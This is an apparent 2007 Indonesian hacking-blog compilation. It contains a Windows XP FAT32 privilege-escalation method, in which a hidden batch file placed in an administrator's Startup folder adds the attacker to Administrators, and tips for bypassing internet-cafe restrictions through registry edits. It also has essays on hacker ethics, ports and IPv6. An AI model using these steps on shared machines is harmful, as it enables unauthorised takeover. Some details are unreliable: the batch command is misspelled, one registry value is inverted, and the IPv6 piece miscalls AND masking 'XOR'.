11 June 2007

Exploitasi Windows XP (Fat32)

Metode eksploitasi yang akan dijelaskan hanya bekerja pada Window XP yang
menggunakan sistim Fat32. Windows XP yang file systemnya Fat32 membolehkan
user biasa mengakses direktory home dari admin yang biasanya terletak
pada:

C:\Documents and Settings\Administrator\

Sedangkan di Windows XP yang file systemnya sudah NTFS, user biasa tidak
akan bisa mengakses direktory home dari admin. Kalau dipaksakan maka
dipastikan dengan sukses akan keluar pesan

Access Denied

Proses eksploitasi dapat dilakukan dengan cara...

MELIHAT USER YANG TERDAFTAR

C:\DOCUME~1\mRt>net user

User accounts for \\CyberCafe

------------------------------------------------------------
Administrator Guest mRt
HelpAssistant SUPPORT_388945a0 Win_Xp
The command completed successfully.

MELIHAT HAK AKSES USER

C:\DOCUME~1\mRt>net user Win_Xp
User name Win_Xp
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/9/2005 3:38 AM
Password expires Never
Password changeable 1/9/2005 3:38 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/26/2005 11:16 PM

Logon hours allowed All

Local Group Memberships *Administrators <-- ketahuan aksesnya Global Group memberships *None The command completed successfully. Setelah mengetahui siapa user yang mempunyai akses admin, sekaranglah saatnya untuk beraksi. Pertama-tama buat dulu script batch yang akan mengangkat user kita menjadi admin. <++ batchfile ++>

net localgoup Administrators mRt /add

<-- batchfile -->

setelah kita buat script batch tersebut, kemudian simpan di
direktory:

C:\Documents and Settings\Win_Xp\Start Menu\Programs\Startup

Agar kelihatan lebih rapi sebaiknya script batch tersebut dibuat
hidden. Lalu mengunggu user yang mempunyai akses admin tersebut
login, setelah user yang mempunyai akses admin tersebut login
maka akses user yang ada pada kita bakalan hilang digantikan
dengan akses admin.

Penutup
Disayangkan, cara ini dapat mengundang kecurigaan admin, karena ketika
sang admin telah melakukan proses login maka dia akan melihat sekelebat
tampilan DOS Prompt yang tiba-tiba muncul di desktopnya.

Semoga artikel ini dapat "sedikit" menambah pengetahuan kita semua.
referensi :
- http://www.google.com/
- The Complete Windows Trojan Paper by Dancho Danchev


by:martin_csk@yahoo.com

04 June 2007

TIPS && TRICK DI WARNET

*Pernahkah suatu saat anda berkunjung ke "cyber cafe" a.k.a warnet
dan anda merasa kerepotan dengan berbagai 'restrict' yang diberlakukan
+disini aku sedikit coba mengulas, apa saja yang dapat anda lakukan
jika anda berada di posisi pemakai dan yang harus anda perhatikan jika
anda berada pada posisi penyedia layanan :PO .

-=PErlindungan Wind*ws explorer
pelarangan penggunaan key wind*ws dengan cara ekstrim banget ( yaitu
dengan mengeksekusi mati tombol tersebut :) ) sehingga anda tidak dapat
melakukan , windows key + e (to open the explorer), ..
hal yang bisa anda lakukan adalah:
-klik-kanan start menu dan pilih explore

-=pelarangan penggunaan win# explorer anda.

-pilih mydocuments, yang akan menjadi jalan pembuka anda ke explorer
jika anda kerepotan karena kehilangan tree view di kiri anda, jangan
khawatir apalagi panik dan berteriak-teriak memanggil operator :P, yang
perlu dan bisa anda lakukan adalah,
arahkan kursor keatas, pada bar atas, pilih view > kemudian Explorer bar
> folders :: apakah sudah nampak seperti explorer bagi anda.

-Kesalahan yang dilakukan oleh penyedia layanan ataupun kelemahan OS tsb
adalah dengan memanfaatkan kelebihan/ kel**han Micr*s**k Internet
Explorer anda , yaitu bukalah browser anda, ketikkan c:\ atau a:\ atau
apapun juga,
* dan saya pernah mengalami kejadian ini, qkqkqkqkqkqk
-pada win* explorer , anda tidak bisa mengakses drive a:\ tanpa password
dari admin a.k.a yang punya (they used another third parties program)
tetapi dengan menggunakan IE anda dapat mengaksesnya tanpa kesulitan :)
atau bahkan tanpa ketahuan :P

ps: ternyata win# explorer dan Mic# IE gak kompak :P

-=apabila windows yang anda pakai tak bisa menampilkan run aku sering pakai run buat mempercepat menggunakan "notepad", "mspaint",
dan tentu saja "command" :P >

yang kudu dilakukan;

-buka teks editor a.k.a notepad or wordpad, lalu ketik dan pastekan ini.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
"NoRun"=dword:00000000

-save sebagai echo.reg [or whatever asal ekstensionnya REG]
-double klik file tersebut , jawab dengan mengklik - yes
-restart pc, cukup dengan Ctrl+Alt+Del, jika keluar popup.pilih eXplorer
terus di endtask aja, wait bentar.. kalo ada popup lagi enDtask lagi :P

=+cara termudah kalo regedit bisa dipakai kamu bisa memasukkannya dari
regedit, coba ketik C:\WINDOWS\regedit.exe di barnya eXplorer, ataupun
pada URL BARnya Internet EXplorer anda :P maka akan keluar window baru
yang berisi regedit :P :),

masuk ke
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer
buat dword baru dan masukkan NoRun dengan dword 00000000

-=kalo regeditnya juga diilangin,nangis aja deh ;p hehhehe, gak kok, kan
kamu bisa buat file diatas itu..
kalo gak munculin dulu regeditnya, caranya :

cara 1-4 sama kayak diatas (males ngetikinnya):
tapi yang dipaste beda ;) ;P


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
System]
"DisableRegistryTools"=dword:00000001

[oke]==
kalo kamu mau repot tinggal buat aja programnya, yang cuma ngejalanin
sintax tersebut diatas dsb.. banyak dah toolsnya..!



EOF.

"segini dulu deh, semoga bermanfaat!, jangan dibuat yang aneh-aneh kalo
gak mau jadi aneh :P"


REFERENSI a.k.a bacaan :
diinspirasi dari berbagai sumber yang dah lawas <*maaf, terlupakan> ,
thanks tuk penulis sebelumnya && percobaan pribadi


*greetz to:
[echostaff a.k.a moby, the_day, comex ,z3r0byt3 ,netrat] && puji_tiwili*
anak anak newbie_hacker, pak onno, pak linus, pak eric s. Raymond,
pak RM. stallman, $peci@l temen2 seperjuangan

kirimkan kritik && saran ke y3dips[at]echo.or.id

Hackers Fact and Fiction

Sudah tidak jarang aku temui atau kita temui bahwa dibeberapa (hampir semua)
media (baik elektronik dan surat kabar) menampilkan berita atau bahkan menjadi
headline dimedia tersebut yang bertuliskan "Seorang Hacker menjebol ****** dan
mencuri ribuan kartu kredit", atau "Hacker situs "211611" akhirnya tertangkap",
atau bahkan hanya "Hacker mengganti tampilan situs ANU dan merubah beberapa
artikel penting".

Terus terang saja cita citaku adalah menjadi hacker (just like u, i just want
to be a hacker)dan hampir di setiap permulaan "seminar" atau "workshop" yang
kebetulan akulah pembawa materinya, maka selalu aku menyebutkannya, dan
setiap kali itu pula berpasang-pasang mata berdelik curiga, menuduh, dan
tidak percaya (sambil geleng kepala) bahwa ada "orang bodoh" lainnya yang
mau-maunya bercita-cita menjadi hacker, atau bahkan berfikir dalam hati "sial,
pembicara kali ini pengen jadi kriminal, salah pilih seminar nih".

Wajar saja, didikan media baik dalam negeri dan luar negeri memang membentuk
pola fikir seperti itu, (ingat bagaimana kita sama-sama dengan pasti mengikuti
satu "script (kalimat)" dari suatu iklan, baik secara sadar atau tidak).
Tidak hanya satu kali film-film keluaran "hollywood" dan lain sebagainya
[MAAF] "memperkosa" pengertian hacker demi keuntungan pribadi/pihak tertentu.

Disini aku mengutip Pengantar yang di tulis oleh Jeff Moss pada sebuah buku
yang berjudul "Stealing the Network: How to Own a Continent" terbitan Syngress,
dan disitu Jeff Moss mengatakan bahwa :

" The term hacker has been co-opted through media hype and
marketing campaigns to mean something evil. It was a convenient
term already in use, and so instead of simply saying someone
was a criminal hacker, the media just called him a hacker.
You would not describe a criminal auto mechanic as simply a
mechanic, and you shouldn't do the same with a hacker, either."
-- 3rd paragraph

Nah, dari kalimat diatas jelas bahwa Jeff Moss ingin mengatakan bahwa
Gembar-gembor media dan keuntungan penjualanlah yang membuat penyalahgunaan
arti hacker, secara ekstrim aku ingin mengambil contoh seorang Guru
yang telah melakukan suatu tindak kriminal pembunuhan, apakah aku dan kita
dengan serta merta menyebut guru adalah pembunuh dan semua guru-guru
lainnya adalah kriminal ? aku rasa tidak, dan yang menjadi pertanyaan
adalah kenapa hal itu tidak berlaku pada hacker, apakah seorang "criminal hacker"
akan di sebut hacker dan hacker adalah seorang kriminal?

Masih tetap di buku yang sama dan di chapter yang sama (pengantar) Jeff Moss
mengungkap bahwa hacker bukan hanya masalah kemampuan tetapi juga "moral"

"While you may have the skills, if you lack the mental fortitude,
you will never reach the top. This is what separates the truly
elite hackers from the wannabe hackers." -- 1st paragraph

Apabila moral tidak terpenuhi maka individu tersebut tidak akan pernah dapat
meraih puncak, dan hal inilah yang sesungguhnya menjadikan pembeda antara
"hacker elit" dan "hacker pemula".

Apabila kamu semakin frustasi dengan pengertian hacker, Jeff Moss menyebutkan
bahwa hacker adalah seseorang yang secara teknis memiliki gabungan kemampuan
sebagai seorang programmer dan administrator sistem komputer yang saling melengkapi.

" Originally, it was a compliment applied to technically adept
computer programmers and system administrators." -- 2nd pragraph

Kevin Mitnick dalam kalimat pengantar di bukunya yang berjudul Art Of Deception,
juga menyebutkan bahwa hacker yang merusak (berbuat kriminal?) disebut
juga "crackers" atau "vandals" dan mereka yang hanya mendownload tools
untuk masuk ke sistem komputer hanyalah "Script Kiddies".

" Some hackers destroy people's files or entire hard drives;
they're called crackers or vandals. Some novice hackers don't
bother learning the technology, but simply download hacker tools
to break into computer systems; they're called script kiddies. "
- Preface
y3dips
---// Referensi

1. Jeff Moss, (Dark tangent, BlackHat.inc)
Stealing the Network: How to Own a Continent, Syngress Publishing (c) 2004

2. Kevin Mitnick, (Condor, )
THE ART OF DECEPTION : "Controlling the Human Element of Security"
Pengenalan Port


Mungkin kita sudah gak asing ama istilah port number, tapi buat yang
belum tahu port adalah sebuah lubang yang memungkinkan suatu (data)
untuk memasukinya. Komputer bisa dikatakan memiliki 2 macam port,
yaitu port fisik dan port perangkat lunak. Port fisik adalah slot yg
ada pada bagian belakang CPU, sedangkan port perangkat lunak adalah port
yg dipakai oleh software saat melakukan koneksi dengan komputer lain.
Nah yg berhubungan secara langsung dengan kegiatan kita saat bermain dgn
internet adalah
port perangkat lunak. Port perangkat lunak ini dapat kita bedakan
menjadi 3, yaitu:

a)well known port
port jenis ini memiliki range dari 0-1023,semula sih hanya memiliki
range dari 0-255 tapi oleh IANA(Internet Assigned Number Authority)
dilebarkan menjadi range tadi yg disebutkan diawal. Pada kebanyakan
sistem port pada range ini hanya dapat dipakai oleh root,atau oleh
program yang dijalankan oleh user. Karena range-nya dari 0-1023 maka
port2 terkenal seperti ftp(21),ssh(22),telnet(23),http(80) termasuk
dalam jenis ini.

b)Registered Ports
memiliki range dari 1024-49151, port jenis ini tidak ditujukan untuk
service tertentu dari suatu server. Lalu apa gunanya dong?? hehehe,
port pada range ini biasanya digunakan oleh Networking utlites seperti
Browser, Email Client, FTP software untuk berkomunikasi dengan remote
server. Biasanya Networking utlites akan membuka secara acak port pada
range ini untuk terhubung dgn remote server. Port number pada range
inilah yang membuat kita dapat melakukan surfing di internet,melakukan
pengecekan e-mail,dll. Jadi sangat berguna kan? hehehe Port ini akan
membuka sementara ketika kita sedang menjalankan sebuah aplikasi
sehingga apabila kita menutup aplikasi tersebut maka secara otomatis
port ini pun akan tertutup dgn sendirinya(ingat Networking utlites
membukanya secara acak)

c)The Dynamic/Private Ports
memiliki range dari 49152-65535, biasanya sih digunakan oleh sebagian
besar trojan(waaaaaaaa..), tapi ada juga sih program yang memkai port
ini terutama program yang memerlukan range port number yang besar,
seperti pada Sun yang menjalankan RPC pada port 32768.

Untuk lebih jelasnya mari kita lihat :

C:\windows>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP juve:1031 juve.box.sk:ftp ESTABLISHED
TCP juve:1036 juve.box.sk:ftp-data TIME_WAIT
TCP juve:1043 banners.egroups.com:80 FIN_WAIT_2
TCP juve:1045 mail.kalteng.net.in:pop3 TIME_WAIT
TCP juve:1052 banners.boxnetwork.net:80 ESTABLISHED
TCP juve:1053 mail.kalteng.net.in:pop3 TIME_WAIT
UDP juve:1025 *:*
UDP juve:nbdatagram *:*

Mari kita ambil satu baris dari contoh diatas :

Proto Local Address Foreign Address State
TCP juve:1031 juve.box.sk:ftp ESTABLISHED

data diatas menunjukan pada kita bahwa:
*Protocol: TCP (ini adalah Transmission Control Protocol atau TCP, User
Datagram
Protocol atau UDP, IP atau Internet Protocol)
*Nama lokal sistem: juve (ini adalah nama dari lokal sistem yang kita
setting pada windows setup)
*Lokal port yang terbuka dan digunakan pada saat melakukan koneksi ini
adalah: 1031
*Remote Sistem: juve.box.sk (ini adalah non-numerical form dari sistem
dimana kita terkoneksi)
*Remote Port: ftp (ini adalah port number dari remote sistem
kalteng.box.sk dimana kita terkoneksi)
*Keterangan koneksi: ESTABLISHED

Itu dulu yah..ntar kapan2 kita sambung lagi,mudah2an ada gunanya buat
kalian. Keep Learning!!!

Penulis :juventini
Email:juventinI@kalteng.net

Pengenalan Internet Protokol versi 6 (IPv6)

Pengenalan Internet Protokol versi 6 (IPv6)


Assalamualaikum wr.wb

Awalnya artikel ini saya tulis tentang implementasi IPv6 pada sistem operasi linux,
tetapi setelah saya tulis kok kepanjangan kalo hanya dijadikan satu primbon oleh
karena itu saya memutuskan menuliskannya kedalam 2 primbon (yaitu pengenalan IPv6 primbon #1,
dan Implementasi IPv6 pada sistem operasi linux primbon #2).


Dalam jaringan komputer dikenal adanya suatu protokol yang mengatur bagaimana
suatu node berkomunikasi dengan node lainnya didalam jaringan, protokol tersebut
berfungsi sebagai bahasa agar satu komputer dapat berkomunikasi satu dengan yang lainnya.
protokol yang merupakan standar de facto dalam jaringan internet yaitu protokol TCP/IP,
sehingga dengan adanya TCP/IP komputer yang dengan berbagai jenis hardware dan berbagai
jenis sistem operasi (linux,Windows X, X BSD, de el el) tetap dapat berkomunikasi.

Internet Protocol (IP) merupakan inti dari protokol TCP/IP, seluruh data yang berasal dari
layer-layer diatasnya harus diolah oleh protokol ini agar sampai ketujuan.versi IP yang saat
ini telah dipakai secara meluas di internet adalah Internet Protocol versi 4 (IPv4).

perkembangan internet yang sangat pesat sekarang ini menyebabkan alokasi alamat (IP addres)
IPv4 semakin berkurang, hal ini menyebabkan harga IP address legal sangat mahal
(kecuali maok!!!heu...heu...).Untuk mengatasi kekurangan alokasi IP address maka IETF
mendesain suatu IP baru yang disebut Internet Protocol versi 6 (IPv6).

pada IPv6, panjang alamat terdiri dari 128 bit sedangkan IPv4 hanya 32 bit. sehingga IPv6
mampu menyediakan alamat sebanyak 2^128 [2 pangkat 128] atau 3X10^38 alamat, sedangkan IPv4
hanya mampu menyediakan alamat sebanyak 2^32 atau 4,5X10^10 alamat.

oke, tadi cuma intro aja! sekarang kita lanjutkan ke yang lebih dalam lagi.
kemon baybeh!!!!!

sekarang saya akan menjelaskan perbedaan yang lainnya antara IPv4 dengan IPv6.

A.Struktur pengalamatan

#IPv4

pengalamatan IPv4 menggunakan 32 bit yang setiap bit dipisahkan dengan notasi titik.
notasi pengalamatan IPv4 adalah sebagai berikut:

XXXXXXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX

dimana setiap simbol X digantikan dengan kombinasi bit 0 dan 1.misalnya:

10000010.11001000.01000000.00000001 (dalam angka biner)

cara penulisan lain agar mudah diinget adalah dengan bentuk 4 desimal yang dipisahkan
dengan titik. misal untuk alamat dengan kombinasi biner seperti diatas dapat dituliskan
sebagai berikut:

130.200.127.254

penulis sudah menganggap teman-teman semua dah bisa cara untuk mengkonversi dari bilangan
biner ke desimal:). cos' kalo harus dijelasakan lagi nanti tambah ruwet nih artikel:p
oke sekarang berlanjut ke struktur pengalamatan IPv6!


#IPv6

Tidak seperti pada IPv4 yang menggunakan notasi alamat sejumlah 32 bit, IPv6 menggunakan
128 bit. dah tau khan kenapa jadi 128 bit? yup biar alokasinya bisa lebih banyak.
oke sekarang kita liat notasi alamat IPv6 adalah sebagai berikut:

X:X:X:X:X:X:X:X

kalo dalam bentuk biner ditulis sebagai berikut:

1111111001111000:0010001101000100:1011111001000001:1011110011011010:
0100000101000101:0000000000000000:0000000000000000:0011101000000000

(dua blok diatas sebenarnya nyambung tapi agar tidak memakan tempat maka ditulis kebawah)
itu notasi alamat IPv6 kalo dalam bentuk biner hal ini sengaja saya tulis bukan untuk membuat
pusing yang baca tetapi untuk menunjukkan betapa panjangnya alamat IPv6.
silahkan bandingkan dengan panjangnya IPv4.

nah! agar lebih mudah diinget setiap simbol X digantikan dengan kombinasi 4 bilangan
heksadesimal dipisahkan dengan simbol titik dua [:]. untuk contoh diatas dapat ditulis sbb:

FE78:2344:BE43:BCDA:4145:0:0:3A

lebih enak diliatnya khan?nah sistem pengalamatan IPv6 dapat disederhanakan jika terdapat
berturut-turut beberapa angka "0". contohnya untuk notasi seperti diatas dapat ditulis:

FE78:2344:BE43:BCDA:4145:0:0:3A -------> FE78:2344:BE43:BCDA:4145::3A

contoh lagi:

8088:0:0:0:0:0:4508:4545 -------->8088::4508:4545


B.Sistem pengalamatan

#IPv4

Sistem pengalamatan IPv4 dibagi menjadi 5 kelas, berdasarkan jumlah host yang dapat dialokasikan
yaitu:

Kelas A : range 1-126
Kelas B : range 128-191
kelas C : range 192-223
kelas D : range 224-247
kelas E : range 248-255

tapi yang lazim dipake hanya kelas A,B dan C sedangkan kelas D dipakai untuk keperluan alamat
multicasting dan kelas E dipake untuk keperluan eksperimental.

selain itu pada IPv4 dikenal istilah subnet mask yaitu angka biner 32 bit yang digunakan untuk
membedakan network ID dan host ID, menunjukkan letak suatu host berada dalam satu jaringan
atau lain jaringan.contohnya kaya gini:

IP address: 164.10.2.1 dan 164.10.4.1 adalah berbeda jaringan jika menggunakan netmask
255.255.254.0, tetapi akan jika netmasknya diganti menjadi 255.255.240.0 maka kedua
IP address diatas adalah berbeda jaringan. paham belom? kalo belom paham gini caranya:


164.10.2.1-------> 10100100.00001010.00000010.00000001
255.255.254.0----> 11111111.11111111.11111110.00000000
____________________________________ XOR
10100100.00001010.00000010.00000000-->164.10.2.0
dan
164.10.4.1-------> 10100100.00001010.00001000.00000001
255.255.254.0----> 11111111.11111111.11111110.00000000
____________________________________ XOR
10100100.00001010.00001000.00000000-->164.10.4.0


operasi XOR caranya seperti pertambahan waktu SD, cuman lebih mudah, gampangnya gini kalo
angka "1" jumlahnya genap hasilnya "1" kalo jumlah "1" ganjil hasilnya "0" (1+1=1, 1+0=0)
(heu...heu...).

terlihat hasil operasi XOR dua IP address dengan netmask yang sama hasilnya beda berarti
kedua IP address tersebut berbeda jaringan. untuk contoh berikutnya yang menggunakan
netmask 255.255.240.0 silahkan coba sendiri.

#IPv6

pada IPv6 tidak dikenal istilah pengkelasan, hanya IPv6 menyediakan 3 jenis pengalamatan
yaitu: Unicast, Anycast dan Multicast. alamat unicast yaitu alamat yang menunjuk pada sebuah
alamat antarmuka atau host, digunakan untuk komunikasi satu lawan satu. pada alamat unicast
dibagi 3 jenis lagi yaitu: alamat link local, alamat site local dan alamat global.
alamat link local adalah alamat yang digunakan di dalam satu link yaitu jaringan local yang
saling tersambung dalam satu level. sedangkan alamat Site local setara dengan alamat privat,
yang dipakai terbatas di dalam satu site sehingga terbatas penggunaannya hanya didalam satu
site sehingga tidak dapat digunakan untuk mengirimkan alamat diluar site ini.
alamat global adalah alamat yang dipakai misalnya untuk Internet Service Provider.

alamat anycast adalah alamat yang menunjukkan beberapa interface (biasanya node yang berbeda).
paket yang dikirimkan ke alamat ini akan dikirimkan ke salahsatu alamat antarmuka yang paling
dekat dengan router. alamat anycast tidak mempunyai alokasi khusus, cos' jika beberapa
node/interface diberikan prefix yang sama maka alamat tersebut sudah merupakan alamat anycast.

alamat multicast adalah alamat yang menunjukkan beberapa interface (biasanya untuk node yang
berbeda). Paket yang dikirimkan ke alamat ini maka akan dikirimkan ke semua interface yang
ditunjukkan oleh alamat ini. alamat multicast ini didesain untuk menggantikan alamat broadcast
pada IPv4 yang banyak mengkonsumsi bandwidth.

Tabel alokasi alamat IPv6
__________________________________________________________________
|alokasi | binary prefix |contoh (16 bit pertama |
|_______________|__________________________|_______________________|
|Global unicast |001 | 2XXX ato 3XXX |
|link local |1111 1110 10 | FE8X - FEBx |
|site local |1111 1110 11 | FECx - FEFx |
|Multicast |1111 1111 | FFxx |
|_______________|__________________________|_______________________|

selain alamat diatas tadi ada juga jenis pengalamatan lainnya diantaranya:

#IPv4-compatible IPv6 address biasanya alamat ini digunakan untuk mekanisme transisi Tunelling
format alamatnya kaya gini:

80 bits |16 | 32 bits |
+-------------------+------+---------------------+
|0000...........0000| 0000 | IPv4 address |
+-------------------+------+---------------------+

contohnya:
= 0:0:0:0:0:0:192.168.30.1
= ::192.168.30.1
= ::C0A8:1E01
jadi 0:0:0:0:0:0:192.168.30.1=::c0AB:1E01 kok bisa dapat dari mane? gini caranya:
buat dulu alamat 0:0:0:0:0:0:192.168.30.1 jadi biner
::11000000.10101000.00011110.00000001 kemudian kelompokkan menjadi masing 16 bit
::[1100.0000.1010.1000]:[0001.1110.0000.0001] diubah ke heksa desimal--->::C0A8:1E01
tanda "." (titik) didalam kurung untuk mempermudah konversi dari biner ke heksadesimal.
sudah pahamkan? masih belum juga silahkan ulangi lagi dengan perlahan:p

#IPv4-mapped IPv6 address biasanya digunakan untuk mekanisme transisi ISATAP.

80 bits |16 | 32 bits |
+-------------------+------+---------------------+
|0000...........0000| FFFF | IPv4 address |
+-------------------+------+---------------------+

contohnya: =::FFFF:192.168.1.2

#IPv6 over ethernet digunakan untuk stateless autoconfiguration (pemberian alamat IPv6
secara otomatis tanpa memerlukan server yang memberi alokasi IP address, mirip DHCP
cuman tanpa server).
contoh:
00:90:27:17:FC:0F
/\
/ \
FF FE
maka alamatnya menjadi 00:90:27:FF:FE:17:FC:0F kemudian diblok pertama bit ketujuh diinvers
00:90:27:17:FC:0F
|
|
\|/
000000[0]0 bit yang dikurungi diinvers dari 0--->1
maka sekarang menjadi 02:90:27:FF:FE:17:FC:0F alamat tersebut adalah alamat IPv6 over ethernet.

oke mungkin segitu dulu tulisan dari saya, sebagai dasar teori untuk IPv6 (ceile!!!!),
sebenarnya masih banyak yang ingin saya tulis cuman nanti terlalu panjang nih artikel takut
ga ada yang baca. (heu.....heu...)

semoga tetap dalam semangat untuk berbagi!!!!!
Wassalam


kritik&saran silahkan kirim ke pan6eran_biru[at]yahoo.com




Referensi:-TCP/IP standard,desain dan Implementasi, Onno W.purbo dkk
-Teori dan Implementasi IPv6 Protokol Internet Masa depan, Riza Taufan
-Interkoneksi IPv6 dengan menggunakan DSTM, Dody Setiawan
-Implementasi dan Analisa Teredo untuk interkoneksi jaringan IPv6/IPv4 dengan jaringan IPv6 yang melalui IPv4 NAT (Network Address Translation), Wahidi Somad
-Introduction & Deployment IPv6 Tutorial,Che Rohani Ishak dkk

Makin berkembangnya teknologi informasi saat ini, kami juga melayani jasa perbaikan serta cleaning dan instalasi ulang berbagai merk note...